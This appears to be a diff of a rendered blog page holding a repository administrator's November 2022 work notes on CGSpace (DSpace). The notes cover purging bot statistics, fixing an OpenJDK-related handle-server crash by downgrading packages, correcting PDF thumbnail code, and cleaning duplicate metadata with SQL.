+</span></span><span style="display:flex;"><span>Purging 7577 hits from 122.10.101.60 in statistics
+</span></span><span style="display:flex;"><span>Purging 6536 hits from 135.125.21.38 in statistics
+</span></span><span style="display:flex;"><span>Purging 23950 hits from 163.237.216.11 in statistics
+</span></span><span style="display:flex;"><span>Purging 4093 hits from 51.254.154.148 in statistics
+</span></span><span style="display:flex;"><span>Purging 2797 hits from 221.219.103.211 in statistics
+</span></span><span style="display:flex;"><span>Purging 2618 hits from 216.218.223.53 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 56546
+</span></span></code></pre></div><ul>
+<li>Also interesting to see a few new user agents:
+<ul>
+<li><code>RStudio Desktop (2022.7.1.554); R (4.2.1 x86_64-w64-mingw32 x86_64 mingw32)</code></li>
+<li><code>rstudio.cloud R (4.2.1 x86_64-pc-linux-gnu x86_64 linux-gnu)</code></li>
+<li><code>MEL</code></li>
+<li><code>Gov employment data scraper ([[your email]])</code></li>
+<li><code>RStudio Desktop (2021.9.0.351); R (4.1.1 x86_64-w64-mingw32 x86_64 mingw32)</code></li>
+</ul>
+</li>
+<li>I will purge all these:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
+</span></span><span style="display:flex;"><span>Purging 6155 hits from RStudio in statistics
+</span></span><span style="display:flex;"><span>Purging 1929 hits from rstudio in statistics
+</span></span><span style="display:flex;"><span>Purging 1454 hits from MEL in statistics
+</span></span><span style="display:flex;"><span>Purging 1094 hits from Gov employment data scraper in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 10632
+</span></span></code></pre></div><ul>
+<li>Work on the CIAT Library items a bit again in OpenRefine
+<ul>
+<li>I flagged items with:
+<ul>
+<li>URL containing &ldquo;#page&rdquo; at the end (these are linking to book chapters, but we don&rsquo;t want to upload the PDF multiple times)</li>
+<li>Same URL used by more than one item (&ldquo;Duplicates&rdquo; facet in OpenRefine, these are some corner case I don&rsquo;t want to handle right now)</li>
+<li>URL containing &ldquo;:8080&rdquo; to CIAT&rsquo;s old DSpace (this server is no longer live)</li>
+</ul>
+</li>
+<li>I want to try to handle the simple cases that should cover most of the items first</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-11-09">2022-11-09</h2>
+<ul>
+<li>Continue working on the Python script to upload PDFs from CIAT Library to the relevant item on CGSpace
+<ul>
+<li>I got the basic functionality working</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-11-12">2022-11-12</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-11-15">2022-11-15</h2>
+<ul>
+<li>Meeting with Marie-Angelique, Sara, and Valentina about CG Core types
+<ul>
+<li>We agreed to continue adding the feedback for each of the proposed actions</li>
+<li>The others will start filling in definitions for the types</li>
+<li>Sara had some good questions about duplicates on CGSpace and how we can possibly prevent them now that several systems are submitting items directly into the repository
+<ul>
+<li>We need to be careful especially with regards to author&rsquo;s outputs that will be reported in the PRMS</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-11-16">2022-11-16</h2>
+<ul>
+<li>Maria asked if we can extend the timeout for XMLUI sessions
+<ul>
+<li>According to <a href="https://gitlab.inf.unibz.it/commul/docker/clarin-dspace/-/issues/44">this issue</a> it seems to be 30 minutes by default, as a Tomcat default</li>
+<li>I think we could extend this to an hour, as there is no real security risk (we&rsquo;re not a bank) and most user&rsquo;s lock screens would have activated after ten minutes or so anyways</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-11-20">2022-11-20</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-11-22">2022-11-22</h2>
+<ul>
+<li>Check and upload some items to CGSpace for Peter
+<ul>
+<li>I am waiting for some feedback from him about some duplicates and metadata issues for the rest</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-11-23">2022-11-23</h2>
+<ul>
+<li>Fix some authorization issues for ABC&rsquo;s TIP submit tool on DSpace Test (the groups were correct on CGSpace, but not on test)</li>
+<li>Peter sent me feedback about the duplicates and metadata questions from yesterday
+<ul>
+<li>I uploaded the eight items for COHESA and sixty-two for Gender</li>
+</ul>
+</li>
+<li>I ran the script to tag ORCID identifiers with my <code>2022-09-22-add-orcids.csv</code> file and tagged twenty-seven</li>
+<li>Maria asked for help uploading a large PDF to CGSpace
+<ul>
+<li>The PDF is only two pages, but it is 139MB!</li>
+<li>I decided to compress it with GhostScript, first with the screen profile (72dpi), then with the ebook profile (150dpi):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ gs -sDEVICE<span style="color:#f92672">=</span>pdfwrite -dCompatibilityLevel<span style="color:#f92672">=</span>1.4 -dPDFSETTINGS<span style="color:#f92672">=</span>/screen -dNOPAUSE -dQUIET -dBATCH -sOutputFile<span style="color:#f92672">=</span>Key<span style="color:#ae81ff">\ </span>facts<span style="color:#ae81ff">\ </span>from<span style="color:#ae81ff">\ </span>a<span style="color:#ae81ff">\ </span>traditional<span style="color:#ae81ff">\ </span>colombian<span style="color:#ae81ff">\ </span>food<span style="color:#ae81ff">\ </span>market-screen.pdf Key<span style="color:#ae81ff">\ </span>facts<span style="color:#ae81ff">\ </span>from<span style="color:#ae81ff">\ </span>a<span style="color:#ae81ff">\ </span>traditional<span style="color:#ae81ff">\ </span>colombian<span style="color:#ae81ff">\ </span>food<span style="color:#ae81ff">\ </span>market.pdf
+</span></span><span style="display:flex;"><span>$ gs -sDEVICE<span style="color:#f92672">=</span>pdfwrite -dCompatibilityLevel<span style="color:#f92672">=</span>1.4 -dPDFSETTINGS<span style="color:#f92672">=</span>/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile<span style="color:#f92672">=</span>Key<span style="color:#ae81ff">\ </span>facts<span style="color:#ae81ff">\ </span>from<span style="color:#ae81ff">\ </span>a<span style="color:#ae81ff">\ </span>traditional<span style="color:#ae81ff">\ </span>colombian<span style="color:#ae81ff">\ </span>food<span style="color:#ae81ff">\ </span>market-ebook.pdf Key<span style="color:#ae81ff">\ </span>facts<span style="color:#ae81ff">\ </span>from<span style="color:#ae81ff">\ </span>a<span style="color:#ae81ff">\ </span>traditional<span style="color:#ae81ff">\ </span>colombian<span style="color:#ae81ff">\ </span>food<span style="color:#ae81ff">\ </span>market.pdf
+</span></span></code></pre></div><ul>
+<li>The ebook one looks really good and is only 2.4MB&hellip;</li>
+<li>But for reference, this free Adobe tool seems to work: <a href="https://www.adobe.com/acrobat/online/compress-pdf.html">https://www.adobe.com/acrobat/online/compress-pdf.html</a></li>
+</ul>
+<h2 id="2022-11-24">2022-11-24</h2>
+<ul>
+<li>My script finished downloading the CIAT Library PDFs
+<ul>
+<li>I did some more work on my <code>post-ciat-pdfs.py</code> script and tested uploading the items to my local DSpace and DSpace Test</li>
+<li>Then I ran the script on CGSpace, uploading ~1,500 PDFs to to existing items</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-11-25">2022-11-25</h2>
+<ul>
+<li>Tony Murray, who is working on IFPRI&rsquo;s CGSpace integration, emailed me to ask some questions about the REST API</li>
+<li>Oh no, I realized there is a logic issue with the PDFbox cropbox code I added a few weeks ago:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -v -f -i 10568/77010
+</span></span><span style="display:flex;"><span>The following MediaFilters are enabled:
+</span></span><span style="display:flex;"><span>Full Filter Name: org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter
+</span></span><span style="display:flex;"><span>org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter
+</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
+</span></span><span style="display:flex;"><span>Changes have been processed
+</span></span><span style="display:flex;"><span>IM Thumbnail tropentag2016_marshall.pdf is replacable.
+</span></span><span style="display:flex;"><span>File: tropentag2016_marshall.pdf.jpg
+</span></span><span style="display:flex;"><span>ERROR filtering, skipping bitstream:
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>        Item Handle: 10568/77010
+</span></span><span style="display:flex;"><span>        Bundle Name: ORIGINAL
+</span></span><span style="display:flex;"><span>        File Size: 1486580
+</span></span><span style="display:flex;"><span>        Checksum: 1ad66d918a56a5e84667386e1a32e352 (MD5)
+</span></span><span style="display:flex;"><span>        Asset Store: 0
+</span></span><span style="display:flex;"><span>java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
+</span></span><span style="display:flex;"><span>java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
+</span></span><span style="display:flex;"><span>        at org.apache.pdfbox.pdmodel.PDPageTree.get(PDPageTree.java:325)
+</span></span><span style="display:flex;"><span>        at org.apache.pdfbox.pdmodel.PDPageTree.get(PDPageTree.java:248)
+</span></span><span style="display:flex;"><span>        at org.apache.pdfbox.pdmodel.PDDocument.getPage(PDDocument.java:1543)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:167)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.getDestinationStream(ImageMagickPdfThumbnailFilter.java:27)
+</span></span><span style="display:flex;"><span>        at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
+</span></span><span style="display:flex;"><span>        at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:232)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>        at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</span></span></code></pre></div><ul>
+<li>Salem gave me a list of CGSpace collections that have double spaces in the names
+<ul>
+<li>Normally this would only be a minor annoyance, but he discovered that the REST API seems to trim the spaces, which causes an issue when trying to reference them!</li>
+<li>He sent me a list of about ten collection UUIDs so I fixed them</li>
+</ul>
+</li>
+<li>I found a bunch of LIVES presentations on CGSpace that have presentations on SlideShare with incorrect licenses&hellip; I updated about fifty of them</li>
+</ul>
+<h2 id="2022-11-26">2022-11-26</h2>
+<ul>
+<li>Sync DSpace Test with CGSpace</li>
+<li>I increased the session timeout in Tomcat from thirty minutes to sixty, as requested by Maria a few weeks ago
+<ul>
+<li>See: <a href="https://gitlab.inf.unibz.it/commul/docker/clarin-dspace/-/issues/44">https://gitlab.inf.unibz.it/commul/docker/clarin-dspace/-/issues/44</a></li>
+</ul>
+</li>
+<li>I re-built DSpace on CGSpace, ran all updates, and rebooted the machine
+<ul>
+<li>Then after coming back up the handle server won&rsquo;t start</li>
+<li>The <code>handle-server.log</code> file shows:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Shutting down...
+</span></span><span style="display:flex;"><span>&#34;2022/11/26 02:12:17 CET&#34; 25 Rotating log files
+</span></span><span style="display:flex;"><span>Error: null
+</span></span><span style="display:flex;"><span>       (see the error log for details.)
+</span></span></code></pre></div><ul>
+<li>In the <code>error.log</code> file I see:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&#34;2022/11/26 02:12:18 CET&#34; 25 Started new run.
+</span></span><span style="display:flex;"><span>java.lang.UnsupportedOperationException
+</span></span><span style="display:flex;"><span>        at java.lang.Runtime.runFinalizersOnExit(Runtime.java:287)
+</span></span><span style="display:flex;"><span>        at java.lang.System.runFinalizersOnExit(System.java:1059)
+</span></span><span style="display:flex;"><span>        at net.handle.server.Main.initialize(Main.java:124)
+</span></span><span style="display:flex;"><span>        at net.handle.server.Main.main(Main.java:75)
+</span></span><span style="display:flex;"><span>Shutting down...
+</span></span></code></pre></div><ul>
+<li>Ah, it seems to be due to an <a href="https://groups.google.com/g/dspace-tech/c/PqjfA5mqG4w/m/FhxI5oXhFwAJ?pli=1">issue in OpenJDK 1.8.0_352</a></li>
+<li>I see the server upgraded to the new JDK version on 2022-11-10:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Upgrade: openjdk-8-jdk-headless:amd64 (8u342-b07-0ubuntu1~20.04, 8u352-ga-1~20.04), openjdk-8-jre-headless:amd64 (8u342-b07-0ubuntu1~20.04, 8u352-ga-1~20.04)
+</span></span><span style="display:flex;"><span>End-Date: 2022-11-10  04:10:45
+</span></span></code></pre></div><ul>
+<li>As highlighted in the dspace-tech mailing list thread above, <a href="https://mail.openjdk.org/pipermail/jdk8u-dev/2022-October/015706.html">this OpenJDK release deprecated <code>Runtime.runFinalizersOnExit</code></a>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>  - JDK-8287132: Retire Runtime.runFinalizersOnExit so that it always throws UOE
+</span></span></code></pre></div><ul>
+<li>I downloaded the previous versions of the packages from Launchpad:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># wget https://launchpad.net/~openjdk-security/+archive/ubuntu/ppa/+build/24195357/+files/openjdk-8-jdk-headless_8u342-b07-0ubuntu1~20.04_amd64.deb
+</span></span><span style="display:flex;"><span># wget https://launchpad.net/~openjdk-security/+archive/ubuntu/ppa/+build/24195357/+files/openjdk-8-jre-headless_8u342-b07-0ubuntu1~20.04_amd64.deb
+</span></span><span style="display:flex;"><span># dpkg -i openjdk-8-j*8u342-b07*.deb
+</span></span></code></pre></div><ul>
+<li>Then the handle-server process starts up fine, so I held these OpenJDK versions for now:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt-mark hold openjdk-8-jdk-headless:amd64 openjdk-8-jre-headless:amd64
+</span></span><span style="display:flex;"><span>openjdk-8-jdk-headless set on hold.
+</span></span><span style="display:flex;"><span>openjdk-8-jre-headless set on hold.
+</span></span></code></pre></div><ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-11-27">2022-11-27</h2>
+<ul>
+<li>I realized I made a mistake in the PDF CropBox code I wrote for dspace-api a few weeks ago
+<ul>
+<li>For PDFs with only one page I was seeing this in the filter-media output:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
+</span></span></code></pre></div><ul>
+<li>It turns out that <a href="https://javadoc.io/static/org.apache.pdfbox/pdfbox/2.0.27/org/apache/pdfbox/pdmodel/PDDocument.html#getPage-int-">PDDocument&rsquo;s getPage() is zero-based</a></li>
+<li>I also updated PDFBox from 2.0.24 to 2.0.27</li>
+<li>I synced DSpace 7 Test with CGSpace
+<ul>
+<li>I had to follow my notes from 2022-03 to delete the missing Atmire migrations</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-11-28">2022-11-28</h2>
+<ul>
+<li>Update <code>ilri/fix-metadata-values.py</code> to update the <code>last_modified</code> date for items when it updates metadata
+<ul>
+<li>This should allow us to use the normal <code>index-discovery</code> (with out <code>-b</code>) as well as having REST API responses showing a correct last modified date</li>
+</ul>
+</li>
+<li>Maria asked me to add some ORCID identifiers for Alliance staff to the controlled vocabulary
+<ul>
+<li>I also updated the <code>add-orcid-identifiers-csv.py</code> to update the <code>last_modified</code> timestamp of the item</li>
+</ul>
+</li>
+<li>I re-factored my CGSpace Python scripts to use a helper <code>util.py</code> module with common functions
+<ul>
+<li>For now it only has the one for updating an item&rsquo;s <code>last_modified</code> timestamp but I will gradually add more</li>
+</ul>
+</li>
+<li>I also ran our list of ORCID identifiers against ORCID&rsquo;s API to see if anyone changed their name format
+<ul>
+<li>Then I ran them on CGSpace with <code>ilri/update-orcids.py</code> to fix them</li>
+</ul>
+</li>
+<li>Normalize the <code>text_lang</code> values for CGSpace metadata again:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+</span></span><span style="display:flex;"><span> text_lang │  count
+</span></span><span style="display:flex;"><span>───────────┼─────────
+</span></span><span style="display:flex;"><span> en_US     │ 2912429
+</span></span><span style="display:flex;"><span>           │  108387
+</span></span><span style="display:flex;"><span> en        │   12457
+</span></span><span style="display:flex;"><span> fr        │       2
+</span></span><span style="display:flex;"><span> vi        │       2
+</span></span><span style="display:flex;"><span> es        │       1
+</span></span><span style="display:flex;"><span> ␀         │       0
+</span></span><span style="display:flex;"><span>(7 rows)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 624.651 ms
+</span></span><span style="display:flex;"><span>localhost/dspacetest= ☘ BEGIN;
+</span></span><span style="display:flex;"><span>BEGIN
+</span></span><span style="display:flex;"><span>Time: 0.130 ms
+</span></span><span style="display:flex;"><span>localhost/dspacetest= ☘ UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;&#39;);
+</span></span><span style="display:flex;"><span>UPDATE 120844
+</span></span><span style="display:flex;"><span>Time: 4074.879 ms (00:04.075)
+</span></span><span style="display:flex;"><span>localhost/dspacetest= ☘ SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+</span></span><span style="display:flex;"><span> text_lang │  count  
+</span></span><span style="display:flex;"><span>───────────┼─────────
+</span></span><span style="display:flex;"><span> en_US     │ 3033273
+</span></span><span style="display:flex;"><span> fr        │       2
+</span></span><span style="display:flex;"><span> vi        │       2
+</span></span><span style="display:flex;"><span> es        │       1
+</span></span><span style="display:flex;"><span> ␀         │       0
+</span></span><span style="display:flex;"><span>(5 rows)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 346.913 ms
+</span></span><span style="display:flex;"><span>localhost/dspacetest= ☘ COMMIT;
+</span></span></code></pre></div><ul>
+<li>Discussing the UN M.49 regions on CGSpace with Valentina and Abenet
+<ul>
+<li>The PRMS team is confused about our regions, which are mostly UN M.49 with some legacy stuff using different ones</li>
+<li>I think we can fix all the stuff for Initiatives from this year very easily, then work on the legacy stuff later</li>
+<li>Also, I noticed that that <a href="https://github.com/konstantinstadler/country_converter/issues/124">country_converter was using the wrong UN M.49 region for Myanmar</a></li>
+<li>I submitted a <a href="https://github.com/konstantinstadler/country_converter/pull/125">pull request</a></li>
+</ul>
+</li>
+<li>I exported a CSV of the Initiatives and ran the csv-metadata-quality script to add missing UN M.49 regions
+<ul>
+<li>To make sure everything was correct I got a list of the changes from csv-metadata-quality and checked them all manually on the UN M.49 site, just in case there was another bug in country_converter</li>
+<li>This fixed regions for about fifty items</li>
+</ul>
+</li>
+<li>I dumped the UN M.49 regions from the CSV on the UNSD website:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -d<span style="color:#e6db74">&#34;;&#34;</span> -c <span style="color:#e6db74">&#39;Region Name,Sub-region Name,Intermediate Region Name&#39;</span> ~/Downloads/UNSD<span style="color:#ae81ff">\ </span>—<span style="color:#ae81ff">\ </span>Methodology.csv | sed -e 1d -e <span style="color:#e6db74">&#39;s/,/\n/g&#39;</span> | sort -u
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Africa
+</span></span><span style="display:flex;"><span>Americas
+</span></span><span style="display:flex;"><span>Asia
+</span></span><span style="display:flex;"><span>Australia and New Zealand
+</span></span><span style="display:flex;"><span>Caribbean
+</span></span><span style="display:flex;"><span>Central America
+</span></span><span style="display:flex;"><span>Central Asia
+</span></span><span style="display:flex;"><span>Channel Islands
+</span></span><span style="display:flex;"><span>Eastern Africa
+</span></span><span style="display:flex;"><span>Eastern Asia
+</span></span><span style="display:flex;"><span>Eastern Europe
+</span></span><span style="display:flex;"><span>Europe
+</span></span><span style="display:flex;"><span>Latin America and the Caribbean
+</span></span><span style="display:flex;"><span>Melanesia
+</span></span><span style="display:flex;"><span>Micronesia
+</span></span><span style="display:flex;"><span>Middle Africa
+</span></span><span style="display:flex;"><span>Northern Africa
+</span></span><span style="display:flex;"><span>Northern America
+</span></span><span style="display:flex;"><span>Northern Europe
+</span></span><span style="display:flex;"><span>Oceania
+</span></span><span style="display:flex;"><span>Polynesia
+</span></span><span style="display:flex;"><span>South America
+</span></span><span style="display:flex;"><span>South-eastern Asia
+</span></span><span style="display:flex;"><span>Southern Africa
+</span></span><span style="display:flex;"><span>Southern Asia
+</span></span><span style="display:flex;"><span>Southern Europe
+</span></span><span style="display:flex;"><span>Sub-Saharan Africa
+</span></span><span style="display:flex;"><span>Western Africa
+</span></span><span style="display:flex;"><span>Western Asia
+</span></span><span style="display:flex;"><span>Western Europe
+</span></span></code></pre></div><ul>
+<li>For now I will combine it with our existing list, which contains a few legacy regions, while we discuss about a long-term plan with Peter and Abenet</li>
+<li>Peter wrote to ask me to change the PIM CRP&rsquo;s full name from <code>Policies, Institutions and Markets</code> to <code>Policies, Institutions, and Markets</code>
+<ul>
+<li>It&rsquo;s apparently the only CRP with an Oxford comma&hellip;?</li>
+<li>I updated them all on CGSpace</li>
+</ul>
+</li>
+<li>Also, I ran an <code>index-discovery</code> without the <code>-b</code> since now my metadata update scripts update the <code>last_modified</code> timestamp as well and it finished in fifteen minutes, and I see the changes in the Discovery search and facets</li>
+</ul>
+<h2 id="2022-11-29">2022-11-29</h2>
+<ul>
+<li>Meeting with Marie-Angelique, Abenet, Sara, Valentina, and Margarita about <code>dcterms.type</code> for CG Core
+<ul>
+<li>We discussed some of the feedback from Peter</li>
+</ul>
+</li>
+<li>Peter and Abenet and I agreed to update some of our metadata in response to the PRMS feedback
+<ul>
+<li>I updated Pacific to Oceania, and Central Africa to Middle Africa, and removed the old ones from the submission form</li>
+<li>These are UN M.49 regions</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-11-30">2022-11-30</h2>
+<ul>
+<li>I ran csv-metadata-quality on an export of the ILRI community on CGSpace, but only with title, country, and region fields
+<ul>
+<li>It fixed some whitespace issues and added missing regions to about 1,200 items</li>
+</ul>
+</li>
+<li>I thought of a way to delete duplicate metadata values, since the CSV upload method can&rsquo;t detect them correctly
+<ul>
+<li>First, I wrote a <a href="https://chartio.com/learn/databases/how-to-find-duplicate-values-in-a-sql-table/">SQL query</a> to identify metadata falues with the same <code>text_value</code>, <code>metadata_field_id</code>, and <code>dspace_object_id</code>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>\COPY (SELECT a.text_value, a.metadata_value_id, a.metadata_field_id, a.dspace_object_id 
+</span></span><span style="display:flex;"><span>    FROM metadatavalue a
+</span></span><span style="display:flex;"><span>    JOIN (
+</span></span><span style="display:flex;"><span>        SELECT dspace_object_id, text_value, metadata_field_id, COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id NOT IN (11, 12, 28, 136, 159) GROUP BY dspace_object_id, text_value, metadata_field_id HAVING COUNT(*) &gt; 1
+</span></span><span style="display:flex;"><span>    ) b
+</span></span><span style="display:flex;"><span>    ON a.dspace_object_id = b.dspace_object_id
+</span></span><span style="display:flex;"><span>    AND a.text_value = b.text_value
+</span></span><span style="display:flex;"><span>    AND a.metadata_field_id = b.metadata_field_id
+</span></span><span style="display:flex;"><span>    ORDER BY a.text_value) TO /tmp/duplicates.txt
+</span></span></code></pre></div><ul>
+<li>(This query excludes metadata for accession and available dates, provenance, format, etc)</li>
+<li>Then, I sorted the file by fields four and one (<code>dspace_object_id</code> and <code>text_value</code>) so that the duplicate metadata for each item were next to each other, used awk to print the second field (<code>metadata_field_id</code>) from every <em>other</em> line, and created a SQL script to delete the metadata</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sort -k4,1 /tmp/duplicates.txt    | <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    awk -F&#39;\t&#39; &#39;NR%2==0 {print $2}&#39; | \
+</span></span><span style="display:flex;"><span>    sed &#39;s/^\(.*\)$/DELETE FROM metadatavalue WHERE metadata_value_id=\1;/&#39; &gt; /tmp/delete-duplicates.sql
+</span></span></code></pre></div><ul>
+<li>This worked very well, but there were some metadata values that were tripled or quadrupled, so it only deleted the first duplicate
+<ul>
+<li>I just ran it again two more times to find the last duplicates, now we have none!</li>
+</ul>
+</li>
+<li>I also generated another SQL file with commands to update the last modified timestamps of these items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ awk -F<span style="color:#e6db74">&#39;\t&#39;</span> <span style="color:#e6db74">&#39;{print $4}&#39;</span> /tmp/duplicates.txt | sort -u | sed <span style="color:#e6db74">&#34;s/^\(.*\)</span>$<span style="color:#e6db74">/UPDATE item SET last_modified=NOW() WHERE uuid=&#39;\1&#39;;/&#34;</span> &gt; /tmp/update-timestamp.sql
+</span></span></code></pre></div><ul>
+<li>Tezira said she was having trouble archiving submissions
+<ul>
+<li>In the afternoon I looked and found a high number of locks:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c | sort -n
+</span></span><span style="display:flex;"><span>     60 dspaceCli
+</span></span><span style="display:flex;"><span>    176 dspaceApi
+</span></span><span style="display:flex;"><span>   1194 dspaceWeb
+</span></span></code></pre></div><p><img src="/cgspace-notes/2022/11/postgres_locks_cgspace-day.png" alt="PostgreSQL database locks"></p>
+<ul>
+<li>The timing looks suspiciously close to when I was running the batch updates on the ILRI community this morning.
+<ul>
+<li>I restarted Tomcat and PostgreSQL and everything was back to normal</li>
